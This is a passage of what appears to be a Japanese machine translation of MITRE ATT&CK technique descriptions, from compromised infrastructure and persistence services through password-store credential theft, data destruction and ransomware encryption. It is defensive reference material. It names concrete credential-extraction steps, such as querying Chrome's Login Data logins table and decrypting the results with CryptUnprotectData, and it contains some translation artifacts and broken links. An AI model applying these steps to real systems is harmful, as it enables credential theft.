ソーシャルメディアのアカウントを侵害する方法はさまざまで、[Phishing for Information](https://attack.mitre.org/techniques/T1598)で認証情報を収集するなどがあります。org/techniques/T1598)、サードパーティのサイトから認証情報を購入する、認証情報をブルートフォースで取得する(例:侵害された認証情報のダンプからパスワードを再利用する)など、ソーシャルメディアのアカウントを侵害するために、敵対者は事前に偵察を行い、作戦を進めるために侵害するアカウントを決定する情報を提供することがあります。

ペルソナは、単一のサイトまたは複数のサイト(例:Facebook、LinkedIn、Twitterなど)に存在することがあります。

敵対者は、侵害されたソーシャルメディアのプロフィールを使って、関心のあるターゲットとの新たなつながりを作ったり、既存のつながりを乗っ取ったりすることができます。これらの接続は、直接の場合もあれば、他の人を介して接続しようとする場合もあります。(引用: NEWSCASTER2014)(引用: BlackHatRobinSage) 危殆化したプロファイルは、初期アクセス時(例:[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))など、敵のライフサイクルの他の段階でも活用される可能性があります。
93
T1554 コンプロマイズ・クライアント・ソフトウェア・バイナリ 侵入者は、クライアントソフトウェアのバイナリを改変して、システムへの持続的なアクセスを確立することがあります。クライアントソフトウェアは、ユーザーがサーバーから提供されるサービスにアクセスするためのものです。一般的なクライアントソフトウェアには、SSH クライアント、FTP クライアント、電子メールクライアント、Web ブラウザなどがあります。

敵対者は、クライアントソフトウェアのバイナリを改変して、そのアプリケーションが使用されているときに悪意のあるタスクを実行することがあります。例えば、敵対者は、クライアントソフトウェアのソースコードをコピーし、バックドアを追加し、ターゲット用にコンパイルして、正規のアプリケーションバイナリ(またはサポートファイル)をバックドア付きのものに置き換えることができます。これらのアプリケーションはユーザーが日常的に実行している可能性があるため、敵対者はこれを利用してホストへの持続的なアクセスを行うことができます。
94
T1584 インフラの妥協 敵対者は、ターゲティングの際に使用できるサードパーティのインフラを侵害する可能性があります。インフラストラクチャのソリューションには、物理サーバやクラウドサーバ、ドメイン、サードパーティのWebサービスなどがあります。インフラを購入、リース、またはレンタルする代わりに、敵対者はインフラを侵害し、敵対者のライフサイクルの他の段階で使用することがあります。(引用:Mandiant APT1)(引用:ICANNDomainNameHijacking)(引用:Talos DNSpionage Nov 2018)(引用:FireEye EPS Awakens Part 2) さらに、敵対者は多数のマシンを侵害して、活用できるボットネットを形成することがあります。

侵害されたインフラを使用することで、敵対者は作戦を準備し、開始し、実行することができます。侵害されたインフラストラクチャを使用することで、敵対者は、評判の高いサイトや信頼されているサイトとの接触など、通常と思われるトラフィックに紛れ込んで活動することができます。侵害されたインフラを使用することで、敵対者は自分の行動を自分に結びつけることが難しくなります。ターゲットにする前に、敵対者は他の敵対者のインフラを侵害することがある(引用:NSA NCSC Turla OilRig)
95
T1584.005 インフラの危殆化ボットネット 敵対者は、多数のサードパーティシステムを侵害してボットネットを形成し、標的化の際に利用することがあります。ボットネットとは、協調してタスクを実行するよう指示できる、侵害されたシステムのネットワークのことです(引用:Norton Botnet)。敵対者は、ブータ/ストレッサ・サービスからボットネットを購入/レンタルする代わりに(引用:Imperva DDoS for Hire)、多数のサードパーティのシステムを侵害して独自のボットネットを構築することがあります。また、敵対者は、ボットを敵対者が管理するC2サーバにリダイレクトするなど、既存のボットネットの乗っ取りを行うこともあります(引用:Dell Dridex Oct 2015) ボットネットを自由に使えるようになった敵対者は、大規模な[Phishing](https://attack.mitre.org/techniques/T1566)や分散型サービス拒否(DDoS)などの後続活動を行うことがあります。 96
T1584.002 インフラの危殆化DNSサーバー 敵対者は、ターゲティング時に使用できるサードパーティのDNSサーバーを侵害する可能性があります。侵害後の活動において、敵対者はDNSトラフィックをコマンド&コントロール(例:[Application Layer Protocol](https://attack.mitre.org/techniques/T1071))などの様々なタスクに利用する可能性があります。

DNSサーバーを侵害することで、敵対者はDNSレコードを変更することができます。このような制御により、組織のトラフィックのリダイレクションが可能になり、敵対者のコレクションやクレデンシャルアクセスの作業が容易になります。(引用:Talos DNSpionage Nov 2018)(引用:FireEye DNS Hijack 2019) また、敵対者は、DNSサーバーの実際の所有者に密告することなく、悪意のあるサーバーを指すサブドメインを静かに作成することができる場合があります。(引用:CiscoAngler)(引用:Proofpoint Domain Shadowing)
97
T1584.001 インフラストラクチャーのコンプロマイズドメイン 敵対者は、ターゲティング時に使用できるドメインやサブドメインをハイジャックすることがあります。ドメイン登録のハイジャックとは、元の登録者の許可を得ずにドメイン名の登録を変更する行為です。(引用:ICANNDomainNameHijacking)敵対者は、ドメインの所有者として登録されている人の電子メールアカウントにアクセスすることができます。その際、パスワードを忘れたと主張して、ドメイン登録の変更を行うことができます。その他の可能性としては、ドメイン登録のヘルプデスクをソーシャルエンジニアリングしてアカウントにアクセスしたり、更新プロセスのギャップを利用したりすることが挙げられます。

サブドメインのハイジャックは、組織が存在しないリソースやデプロビジョニングされたリソースを指すDNSエントリを持っている場合に発生します。このような場合、敵対者はサブドメインを制御して、そのドメインに関連する信頼の恩恵を受けて操作を行うことができます。(引用:Microsoft Sub Takeover 2020)
98
T1584.004 インフラの危殆化サーバー 敵対者は、ターゲット設定時に使用できるサードパーティのサーバを侵害することがあります。サーバーを使用することで、敵対者は作戦を準備し、開始し、実行することができます。危殆化した後の活動では、敵対者はコマンド&コントロールを含む様々なタスクにサーバを利用することができます。サーバ](https://attack.mitre.org/techniques/T1583/004)や[Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)を購入する代わりに、敵対者は作戦をサポートするためにサードパーティのサーバを侵害することがあります。

また、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)のように、敵対者は水飲み場作戦をサポートするためにウェブサーバを侵害することがあります。
99
T1584.003 コンプロマイズ・インフラ仮想プライベートサーバ 敵対者は、ターゲティング時に使用できるサードパーティ製の仮想プライベートサーバ(VPS)を侵害する可能性があります。仮想マシンやコンテナをサービスとして販売する、さまざまなクラウドサービスプロバイダーが存在します。敵対者は、第三者が購入したVPSを侵害する可能性があります。(Citation: NSA NCSC Turla OilRig)

コマンド&コントロールなど、敵のライフサイクルの後期段階で使用するためにVPSを侵害することで、敵は、侵害されたサードパーティによって追加されたものだけでなく、より高い評価を受けているクラウドサービスプロバイダに関連するユビキタス性と信頼性を利用することができます。
100
T1584.006 インフラの危うさウェブサービス 敵対者は、ターゲット設定時に使用できるサードパーティのWebサービスへのアクセスを侵害する可能性があります。GitHub、Twitter、Dropbox、Googleなど、正当なユーザーがウェブベースのサービスに登録するためのさまざまな人気のウェブサイトが存在しています。敵対者は、正当なユーザーのWebサービスへのアクセス権を取得し、そのWebサービスをサイバー作戦を支援するインフラとして利用しようとする可能性があります。このようなWebサービスは、敵のライフサイクルの後の段階、例えばCommand and Control ([Web Service](https://attack.mitre.org/techniques/T1102))や[Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567)の際に悪用される可能性があります。(引用:Recorded Future Turla Infra 2020) GoogleやTwitterが提供するような一般的なサービスを利用することで、敵は予想されるノイズの中に隠れることが容易になります。ウェブサービスを利用することで、特に正規のユーザーからアクセスを奪われた場合、敵対者は物理的に操作を結びつけることが難しくなります。 101
T1609 コンテナ管理コマンド 敵対者は、コンテナ管理サービスを悪用して、コンテナ内でコマンドを実行することがあります。Dockerデーモン、Kubernetes APIサーバー、kubeletなどのコンテナ管理サービスは、環境内のコンテナのリモート管理を可能にすることがあります。(引用:Docker Daemon CLI)(引用:Kubernetes API)(引用:Kubernetes Kubelet)

Dockerでは、敵対者はコンテナ展開時にスクリプトやコマンドを実行するエントリポイントを指定したり、<code>docker exec</code>などのコマンドを使用して実行中のコンテナ内でコマンドを実行したりすることがあります。(引用:Docker Entrypoint)(引用:Docker Exec) Kubernetesでは、敵対者が十分な権限を持っている場合、Kubernetes APIサーバーやkubeletとのやりとり、または<code>kubectl exec</code>などのコマンドを実行することで、クラスタ内のコンテナでのリモート実行を得ることができます(引用:Kubectl Exec Get Shell)
102
T1613 コンテナとリソースの発見 侵入者は、コンテナや、コンテナ環境で利用可能なその他のリソースを発見しようとするかもしれません。

これらのリソースは、Kubernetesのダッシュボードなどのウェブアプリケーション内で表示したり、DockerやKubernetesのAPIを介して照会したりすることができます。(引用:Docker API)(引用:Kubernetes API) Dockerでは、環境の構成、どのサービスが利用可能か、被害者がどのクラウドプロバイダーを利用しているかなど、環境に関する情報がログから漏れることがあります。これらのリソースの発見は、どのように横移動を行うか、どのメソッドを利用して実行するかなど、敵対者の環境における次のステップにつながる可能性があります。
103
T1136 アカウントの作成 侵入者は、被害者のシステムへのアクセスを維持するためにアカウントを作成することがあります。十分なアクセスレベルがあれば、このようなアカウントを作成することで、システムに永続的なリモートアクセスツールを導入する必要のない二次的な認証アクセスを確立することができます。

アカウントは、ローカルシステム、ドメイン、またはクラウドテナント内で作成することができます。クラウド環境では、敵対者が特定のサービスにのみアクセスできるアカウントを作成することがあり、これにより検知の可能性が低くなります。
104
T1136.003 アカウントの作成クラウドアカウント 敵対者は、被害者のシステムへのアクセスを維持するためにクラウドアカウントを作成することがあります。十分なレベルのアクセスがあれば、そのようなアカウントは、システム上に永続的なリモートアクセスツールを展開する必要のない二次的な認証アクセスを確立するために使用することができます。(引用:Microsoft O365 Admin Roles)(引用:Microsoft Support O365 Add Another Admin, October 2019)(引用:AWS Create IAM User)(引用:GCP Create Cloud Identity Users)(引用:Microsoft Azure AD Users)

敵対者は、特定のクラウドサービスにのみアクセスできるアカウントを作成することがあり、これにより発見の機会を減らすことができます。
105
T1136.002 アカウントの作成ドメインアカウント 侵入者は、被害者のシステムへのアクセスを維持するために、ドメインアカウントを作成することがあります。ドメインアカウントとは、Active Directoryドメインサービスによって管理されるアカウントで、そのドメインに属するシステムやサービス全体のアクセスと権限が設定される。ドメインアカウントには、ユーザーアカウント、管理者アカウント、サービスアカウントなどがある。

このようなアカウントは、システム上に永続的なリモートアクセスツールを展開する必要のない二次的な認証されたアクセスを確立するために使用することができます。
106
T1136.001 アカウントの作成ローカルアカウント 侵入者は、被害者のシステムへのアクセスを維持するために、ローカルアカウントを作成することがあります。ローカルアカウントとは、ユーザー、リモートサポート、サービス、または単一のシステムやサービスの管理者が使用するために組織が設定したアカウントです。十分なアクセスレベルがあれば、<code>net user /add</code>コマンドを使用してローカルアカウントを作成することができます。

このようなアカウントは、システム上に永続的なリモートアクセスツールを展開する必要のない、二次的な認証されたアクセスを確立するために使用することができます。
107
T1543 システムプロセスの作成・変更 敵対者は、パーシステンスの一環として、悪意のあるペイロードを繰り返し実行するために、システムレベルのプロセスを作成または変更することがあります。オペレーティングシステムは、起動時に、システムのバックグラウンド機能を実行するプロセスを開始することができます。WindowsやLinuxでは、これらのシステムプロセスはサービスと呼ばれています。(引用:TechNet Services) macOSでは、[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)や[Launch Agent](https://attack.mitre.org/techniques/T1543/001)と呼ばれるlaunchdプロセスが実行され、システムの初期化が完了し、ユーザー固有のパラメータが読み込まれます。(引用:AppleDocs Launch Agent Daemons)

敵対者は、持続性を確立するために、起動時または繰り返し実行するように設定可能な新しいサービス、デーモン、またはエージェントをインストールすることがあります。

サービス、デーモン、エージェントは、管理者権限で作成しても、root/SYSTEM権限で実行されることがあります。敵対者はこの機能を利用して、特権を昇格させるためにシステムプロセスを作成または変更する可能性があります。(引用:OSX Malware Detection).
108
T1543.001 システムプロセスの作成・修正エージェントの起動 敵対者は、パーシステンスの一環として悪意のあるペイロードを繰り返し実行するために、ローンチエージェントを作成または変更する可能性があります。Appleの開発者向けドキュメントによると、ユーザーがログインすると、ユーザーごとのlaunchdプロセスが起動し、<code>/System/Library/LaunchAgents</code>、<code>/Library/LaunchAgents</code>、<code>$HOME/Library/LaunchAgents</code>にあるプロパティリスト(plist)ファイルから、各ローンチオンデマンドユーザーエージェントのパラメータを読み込みます(引用:AppleDocs Launch Agent Daemons)。AppleDocs Launch Agent Daemons)(引用:OSX Keydnap malware)(引用:Antiquated Mac Malware)があります。これらのローンチエージェントは、起動される実行ファイルを指すプロパティリストファイルを持っています(引用:OSX.Dokマルウェア)。

敵対者は、launchdやlaunchctlを使って適切なディレクトリにplistをロードすることで、ログイン時に実行するように設定できる新しいローンチエージェントをインストールすることがあります(引用:Sofacy Komplex Trojan)(引用:Methods of Mac Malware Persistence)。エージェント名は、関連するOSや良性のソフトウェアの名前を使用して偽装することができます。起動エージェントは、ユーザーレベルの権限で作成され、ユーザーがログインするとそのユーザーの権限で実行されます(引用:OSX Malware Detection)(引用:OceanLotus for OS X)。特定のユーザーがログインしたとき(特定のユーザーのディレクトリ構造の中)に実行されるように設定することも、任意のユーザーがログインしたとき(管理者権限が必要)に実行されるように設定することもできます。
109
T1543.004 システムプロセスの作成と変更デーモンの起動 敵対者は、パーシステンスの一環として悪意のあるペイロードを繰り返し実行するために、launch daemonを作成または変更する可能性があります。Apple社の開発者向けドキュメントによると、macOSおよびOS Xが起動すると、システムの初期化を完了するためにlaunchdが実行されます。この処理では、<code>/System/Library/LaunchDaemons</code>および<code>/Library/LaunchDaemons</code>にあるプロパティリスト(plist)ファイルから、各ローンチオンデマンドのシステムレベルデーモンのパラメータを読み込みます(引用:AppleDocs Launch Agent Daemons)。これらのLaunchDaemonには、起動される実行ファイルを示すプロパティリストファイルがあります(引用:Methods of Mac Malware Persistence)。

敵対者は、launchdやlaunchctlを使って適切なディレクトリにplistをロードすることで、起動時に実行するように設定できる新しいLaunch Daemonをインストールすることがあります(引用:OSX Malware Detection)。デーモンの名前は、関連するOSや良心的なソフトウェアの名前を使って偽装することができます(引用:WireLurker)。起動デーモンは、管理者権限で作成されていても、ルート権限で実行されるため、敵対者はサービスを利用して管理者からルートに権限を昇格させることも可能です。

plistファイルのパーミッションはroot:wheelでなければなりませんが、それが指すスクリプトやプログラムにはそのような要件はありません。そのため、設定が不十分な場合、敵対者が現在のLaunch Daemonの実行ファイルを変更し、持続性や特権エスカレーションを得ることが可能です。
110
T1543.002 システムプロセスの作成・変更Systemdサービス 侵入者は、持続性の一環として悪意のあるペイロードを繰り返し実行するために、systemdサービスを作成または変更することがあります。systemdサービスマネージャーは、バックグラウンドのデーモンプロセス(サービスとも呼ばれる)やその他のシステムリソースを管理するために一般的に使用されます。(引用:Linux man-pages: systemd January 2014)(引用:Freedesktop.org Linux systemd 29SEP2018) Systemdは、Debian 8、Ubuntu 15をはじめとする多くのLinuxディストリビューションでデフォルトの初期化(init)システムとなっています。

Systemdは、サービスユニットと呼ばれる設定ファイルを利用して、サービスがどのような条件でどのように起動するかを制御します。デフォルトでは、これらのユニットファイルは <code>/etc/systemd/system</code> と <code>/usr/lib/systemd/system</code> ディレクトリに保存され、ファイル拡張子は <code>.service</code> です。

* ExecStart, ExecStartPre, and ExecStartPost ディレクティブは、サービスが 'systemctl' によって手動で開始されたとき、またはサービスが自動的に開始されるように設定されている場合はシステム開始時のコマンドの実行をカバーします。
* ExecReload ディレクティブは、サービスが再起動するときをカバーします。
* ExecStop and ExecStopPost ディレクティブは、サービスが停止されたとき、または 'systemctl' によって手動で停止されたときをカバーします。

敵対者はsystemdの機能を利用して、システム起動時にsystemdに悪意のあるコマンドを実行させるサービスユニットファイルを作成・修正することで、被害者システムへの持続的なアクセスを確立しています。(Citation: Anomali Rocke March 2019)

敵対者は通常、<code>/etc/systemd/system</code>および<code>/usr/lib/systemd/system</code>ディレクトリ内のサービスユニットファイルを作成/修正するためにroot権限を必要としますが、低権限のユーザーは、<code>~/.config/systemd/user/</code>などのディレクトリにサービスユニットファイルを作成/修正することで、ユーザーレベルのパーシスタンスを実現することができます(引用:Rapid7 Service Persistence 22JUNE2016)。
111
T1543.003 システムプロセスの作成・変更Windowsサービス 敵対者は、パーシステンスの一環として、悪意のあるペイロードを繰り返し実行するために、Windowsサービスを作成または変更することがあります。Windowsは起動時に、システムのバックグラウンド機能を実行するサービスと呼ばれるプログラムやアプリケーションを起動します。(引用:TechNet Services) サービスの実行ファイルや回復プログラム/コマンドのファイルパスなど、Windowsのサービス構成情報は、Windowsレジストリに保存されます。サービスの構成は、sc.exeや[Reg](https://attack.mitre.org/software/S0075)などのユーティリティを使用して変更することができます。

敵対者は、システムユーティリティを使用してサービスとやり取りしたり、レジストリを直接変更したり、カスタムツールを使用してWindows APIとやり取りしたりすることで、新しいサービスをインストールしたり、既存のサービスを変更したりすることができます。

また、敵対者は、関連するオペレーティングシステムや善意のソフトウェアのサービス名を使用したり、既存のサービスを変更して検出分析を困難にしたりすることで、[マスカレード](https://attack.mitre.org/techniques/T1036)を組み込む可能性があります。

サービスは、管理者権限で作成されていても、実行はSYSTEM権限で行われるため、敵対者はサービスを利用して管理者からSYSTEMへと権限を昇格させることも可能です。また、敵対者は[サービスの実行](https://attack.mitre.org/techniques/T1569/002)を通じてサービスを直接起動することもできます。
112
T1555 パスワードストアからの認証情報 敵対者は、ユーザの認証情報を取得するために、共通のパスワード保存場所を探すことがあります。パスワードは、認証情報を保持するオペレーティング・システムやアプリケーションに応じて、システムの複数の場所に保存されます。また、ユーザが管理・維持しやすいようにパスワードを保存する特定のアプリケーションもあります。認証情報を取得すると、横移動や制限された情報へのアクセスに使用することができます。 113
T1555.003 パスワードストアからのクレデンシャル。ウェブブラウザからの認証情報 Adversariesは、対象となるブラウザに固有のファイルを読み取ることで、Webブラウザから認証情報を取得することがあります(引用:Talos Olympic Destroyer 2018)Webブラウザは一般的に、Webサイトのユーザー名やパスワードなどの認証情報を保存し、将来的に手動で入力する必要がないようにします。Webブラウザは通常、クレデンシャルストア内に暗号化された形式でクレデンシャルを保存しますが、Webブラウザから平文のクレデンシャルを抽出する方法も存在します。

例えば、Windowsシステムでは、<code>AppData\Local\GoogleChrome\User Data\Default\Login Data</code>というデータベースファイルを読み込んで、<code>SELECT action_url, username_value, password_value FROM logins;</code>というSQLクエリを実行することで、Google Chromeから暗号化された認証情報を取得することができます。その後、暗号化された認証情報をWindows API関数の<code>CryptUnprotectData</code>に渡すことで、平文のパスワードを取得することができます。この関数は、被害者のキャッシュされたログオン認証情報を復号鍵として使用します。(引用:Microsoft CryptUnprotectData 2018年4月)

Adversariesは、FireFox、Safari、Edgeなどの一般的なWebブラウザに対して同様の手順を実行しています(引用:Proofpoint Vega Credential Stealer 2018年5月)(引用:FireEye HawkEye Malware 2017年7月) Windowsは、Internet ExplorerとMicrosoft Edgeの認証情報を[Windows Credential Manager]が管理するCredential Lockerに格納します(https://attack.mitre.org/techniques/T1555/004)

敵対者は、Webブラウザのプロセスメモリを検索して、認証情報とよく一致するパターンを探すことで認証情報を取得することもあります(引用:GitHub Mimikittenz 2016年7月)

Webブラウザから認証情報を取得した後、敵対者はアクセスを拡大するために、異なるシステムやアカウントで認証情報を再利用しようとすることがあります。これは、ウェブブラウザから得た認証情報が特権アカウント(例:ドメイン管理者)と重なる場合に、敵対者の目的を著しく促進する結果となる可能性があります。
114
T1555.001 パスワードストアからの認証情報キーチェーン 敵対者は、認証情報を取得するために、システムからキーチェーンの保存データを収集することがあります。キーチェーンは、WiFiパスワード、Webサイト、セキュアノート、証明書、Kerberosなどの多くのサービスや機能のために、ユーザーのパスワードや認証情報を記録するmacOSの組み込み方法です。キーチェーンファイルは、<code>~/Library/Keychains/</code>、<code>/Library/Keychains/</code>、<code>/Network/Library/Keychains/</code>にあります。(引用:Wikipedia keychain)これらの認証情報を管理するためには、macOSにデフォルトで組み込まれている<code>security</code>コマンドラインユーティリティーが便利です。

認証情報を管理するために、ユーザーは自分のキーチェーンにアクセスするための追加の認証情報を使用しなければなりません。もし敵がログインキーチェーンの認証情報を知っていれば、この金庫に保存されている他のすべての認証情報にアクセスできてしまいます。(引用:External to DA, the OS X Way) デフォルトでは、キーチェーンのパスフレーズはユーザーのログオン認証情報です。
115
T1555.005 パスワードストアからの認証情報パスワードマネージャー 敵対者は、サードパーティのパスワードマネージャーからユーザーの認証情報を取得することがあります。(引用:ise Password Manager 2019年2月) パスワードマネージャーは、ユーザーの認証情報を、通常は暗号化されたデータベースに保存するように設計されたアプリケーションです。クレデンシャルは通常、ユーザーがデータベースをロック解除するマスターパスワードを提供した後にアクセス可能になります。データベースのロックが解除された後、これらの認証情報はメモリにコピーすることができます。これらのデータベースは、ディスク上のファイルとして保存することができます。(引用: ise Password Manager 2019年2月)

敵対者は、マスターパスワードおよび/または平文の認証情報をメモリから抽出することで、パスワードマネージャからユーザーの認証情報を取得することができます。(引用: FoxIT Wocao 2019年12月)(引用: Github KeeThief) 敵対者は、[Exploitation for Credential Access]を介してメモリから認証情報を抽出することができます。(https://attack.mitre.org/techniques/T1212)。(引用:NVDE CVE-2019-3610)
敵対者は、パスワードマネージャーのマスターパスワードを取得するために、[Password Guessing](https://attack.mitre.org/techniques/T1110/001)を介してブルートフォースを試みることもあります。(引用:Cyberreason Anchor 2019年12月)
116
T1555.002 パスワードストアからのクレデンシャルSecurityd Memory 敵対者は、ルートアクセス(securitydのメモリを読むことができる)を得て、メモリをスキャンし、比較的少ない試行回数で正しい鍵のシーケンスを見つけ、ユーザーのログオンキーチェーンを解読することができます。これにより、ユーザ、WiFi、メール、ブラウザ、証明書、セキュアノートなどのすべての平文パスワードが敵対者に提供されてしまいます。(引用:OS X Keychain)(引用:OSX Keydnap malware)

El Capitan以前のOS Xでは、Appleのキーチェーンの実装により、ログインしたユーザのキーチェーンの平文パスワードをキャッシュすることができるため、root権限を持つユーザはログインしたユーザの平文パスワードを読むことができます。(引用:OS X Keychain) (引用:External to DA, the OS X Way) Appleのsecuritydユーティリティは、ユーザのログオンパスワードを受け取り、PBKDF2で暗号化し、このマスターキーをメモリに保存します。Appleはまた、ユーザーのパスワードを暗号化するために一連のキーとアルゴリズムを使用しますが、マスターキーが見つかれば、攻撃者は他の値を反復するだけで最終的なパスワードを解除することができます。(引用:OS X Keychain)
117
T1555.004 パスワードストアからのクレデンシャルWindowsクレデンシャルマネージャ 敵対者は、Windows Credential Manager からクレデンシャルを取得することができる。クレデンシャル マネージャは、NTLM または Kerberos を介した認証を要求する Web サイト、アプリケーショ ン、および/またはデバイスにサインインするためのクレデンシャルを、クレデンシャル ロッカー(以前は Windows Vaults と呼ばれていた)に格納する。(引用: Microsoft Credential Manager store)(引用: Microsoft Credential Locker)

Windows クレデンシャル マネージャは、Web サイトのクレデンシャルをアプリケーションまたはネットワーク のクレデンシャルから分離し、2 つのロッカーに格納している。Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003)の一部として、Internet ExplorerとMicrosoft EdgeのWebサイトのクレデンシャルは、クレデンシャルマネージャによって管理され、Webクレデンシャルのロッカーに格納される。

クレデンシャルロッカーは、クレデンシャルを暗号化された<code>.vcrd</code>ファイルに格納し、<code>%Systemdrive%Users\\</code>に配置される。暗号化キーは、<code>Policy.vpol</code>という名前のファイルにあり、通常はクレデンシャルと同じフォルダにあります。(引用: passcape Windows Vault)(引用: Malwarebytes The Windows Vault)

敵対者は、いくつかのメカニズムを使って、Windows Credential Managerで管理されているクレデンシャルをリストアップすることができます。<code>vaultcmd.exe</code>はWindowsのネイティブな実行ファイルで、コマンドラインイン ターフェースを介してクレデンシャルロッカーに保存されているクレデンシャルを列挙するために使 用することができます。敵対者は、クレデンシャルロッカーの内部にあるファイルを読み取ることで、クレデンシャルを収集することができます。また、<code>CredEnumerateA</code>などのWindows APIを悪用して、クレデンシャル マネージャで管理されているクレデンシャルを列挙することもできます。(引用: Microsoft CredEnumerate)(引用: Delpy Mimikatz Crendential Manager)

敵対者は、パスワード回復ツールを使用して、クレデンシャル マネージャからプレーンテキストのパスワードを取得することができます。(引用: Malwarebytes The Windows Vault)
118
T1485 データ破壊 敵対者は、特定のシステムまたはネットワーク上の大量のデータやファイルを破壊し、システム、サービス、ネットワークリソースの利用を妨害することがあります。データ破壊は、ローカルドライブやリモートドライブ上のファイルやデータを上書きすることで、保存されたデータをフォレンジック技術で回復できなくする可能性が高い。(引用:Symantec Shamoon 2012)(引用:FireEye Shamoon Nov 2016)(引用:Palo Alto Shamoon Nov 2016)(引用:Kaspersky StoneDrill 2017)(引用:Unit 42 Shamoon3 2018)(引用:Citation:Talos Olympic Destroyer 2018)<code>del</code>や<code>rm</code>などの一般的なオペレーティングシステムのファイル削除コマンドは、ファイルの内容自体を消去せずにファイルへのポインタのみを削除することが多く、適切なフォレンジック手法によってファイルを復元可能にします。この動作は、ストレージディスクのセクションやディスクの論理構造ではなく、個々のファイルが破壊されるため、[Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001)や[Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002)とは異なります。

敵対者は、ファイルやディレクトリをランダムに生成されたデータで上書きし、復元不可能にしようとすることがあります。(引用:Kaspersky StoneDrill 2017)(引用:Unit 42 Shamoon3 2018) 場合によっては、政治的なイメージファイルがデータの上書きに使用されることもあります。(引用:FireEye Shamoon Nov 2016)(引用:Palo Alto Shamoon Nov 2016)(引用:Kaspersky StoneDrill 2017)

ネットワーク全体の可用性の中断が目標となる運用において、標的となる組織への影響を最大化するために、データの破壊を目的としたマルウェアは、ワームのような機能を持ち、[Valid Accounts](https://attack.mitre.org/techniques/T1078)、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)などがあります。(引用:Symantec Shamoon 2012)(引用:FireEye Shamoon Nov 2016)(引用:Palo Alto Shamoon Nov 2016)(引用:Kaspersky StoneDrill 2017)(引用:Talos Olympic Destroyer 2018)です。)

クラウド環境では、敵対者は、削除されたクラウドストレージ、クラウドストレージアカウント、マシンイメージ、および運用に不可欠なその他のインフラストラクチャへのアクセスを活用して、組織やその顧客に損害を与える可能性があります。(引用:Data Destruction - Threat Post)(引用:DOJ - Cisco Insider)
119
T1132 データエンコーディング 敵対者は、コマンド&コントロール トラフィックの内容を検出しにくくするために、データをエンコードすることがあります。コマンド&コントロール(C2)情報は、標準的なデータ エンコード システムを使用してエンコードできます。データ エンコーディングの使用は、既存のプロトコル仕様に準拠しており、ASCII、Unicode、Base64、MIME、またはその他のバイナリ-テキストおよび文字エンコーディング システムの使用が含まれます。 120
T1132.002 データのエンコーディング。非標準のエンコーディング 敵対者は、コマンド&コントロール トラフィックのコンテンツを検出しにくくするために、非標準のデータ エンコード システムでデータをエンコードすることがあります。コマンド&コントロール(C2)情報は、既存のプロトコル仕様から乖離した非標準のデータ符号化方式を用いて符号化することができます。非標準データ符号化方式は、HTTPリクエストのメッセージボディに対する修正されたBase64符号化など、標準データ符号化方式に基づいているか、または関連している場合があります。(引用:Wikipedia Binary-to-text Encoding)(引用:Wikipedia Character Encoding)。 121
T1132.001 データのエンコーディング。標準エンコーディング 敵対者は、コマンド&コントロール トラフィックのコンテンツを検出しにくくするために、標準的なデータ エンコード システムでデータをエンコードすることがあります。コマンド&コントロール(C2)情報は、既存のプロトコル仕様に準拠した標準的なデータ エンコーディング システムを使用してエンコードできます。一般的なデータエンコード方式には、ASCII、Unicode、16進数、Base64、MIMEなどがあります。(引用:Wikipedia Binary-to-text Encoding) (引用:Wikipedia Character Encoding) データエンコード方式の中には、gzipのようにデータ圧縮を行うものもあります。 122
T1486 データを暗号化してインパクトを与える 敵対者は、ターゲットシステムやネットワーク上の多数のシステムのデータを暗号化して、システムやネットワークのリソースの利用を妨害することがあります。また、ローカルドライブやリモートドライブ上のファイルやデータを暗号化し、復号化キーへのアクセスを保留することで、保存されたデータにアクセスできないようにすることもできます。これは、被害者から復号化または復号化キーと引き換えに金銭的な補償を引き出すため(ランサムウェア)、またはキーが保存または送信されない場合にデータに永久にアクセスできないようにするために行われます。(引用:US-CERT Ransomware 2016)(引用:FireEye WannaCry 2017)(引用:US-CERT NotPetya 2017)(引用:US-CERT SamSam 2018) ランサムウェアの場合、Officeドキュメント、PDF、画像、動画、音声、テキスト、ソースコードファイルなどの一般的なユーザーファイルが暗号化されるのが一般的です。場合によっては、敵対者が重要なシステムファイル、ディスクパーティション、MBRを暗号化することもあります。(引用:US-CERT NotPetya 2017)

ターゲットとなる組織への影響を最大化するために、データを暗号化するために設計されたマルウェアは、ワームのような機能を持ち、[Valid Accounts]のような他の攻撃手法を利用してネットワークを伝播することがあります。(https://attack.mitre.org/techniques/T1078)、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)などの攻撃手法を利用して、ネットワーク上に伝播することがあります。(引用:FireEye WannaCry 2017)(引用:US-CERT NotPetya 2017)

クラウド環境では、侵害されたアカウント内のストレージオブジェクトも暗号化されることがあります。(引用:Rhino S3 Ransomware Part 1)
123
T1565 データ操作 敵対者は、外部の結果を操作したり、活動を隠したりするために、データを挿入、削除、操作することがあります。データを操作することで、ビジネスプロセスや組織の理解、意思決定に影響を与えようとします。

修正の種類とその影響は、対象となるアプリケーションやプロセス、敵対者の目標や目的によって異なります。複雑なシステムの場合、敵対者が望ましい影響を与えるためには、そのシステムに関連する特別な専門知識や、場合によっては特殊なソフトウェアへのアクセスが必要になるでしょう。
124
T1565.003 Data Manipulation:ランタイム・データ・マニピュレーション Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) ランタイムデータを操作することで、敵対者はビジネスプロセス、組織の理解、意思決定に影響を与えようとする可能性があります。

敵対者は、ランタイム操作を引き起こすために、データの表示に使用されるアプリケーションバイナリを変更することがあります。また、同様の効果を狙って、[Change Default File Association](https://attack.mitre.org/techniques/T1546/001)や[Masquerading](https://attack.mitre.org/techniques/T1036)を行うこともあります。修正の種類とその影響は、対象となるアプリケーションやプロセス、および敵対者の目標や目的によって異なります。複雑なシステムの場合、敵対者が望ましい影響を与えるためには、そのシステムに関連する特別な専門知識や、場合によっては特殊なソフトウェアへのアクセスが必要になるでしょう。
125
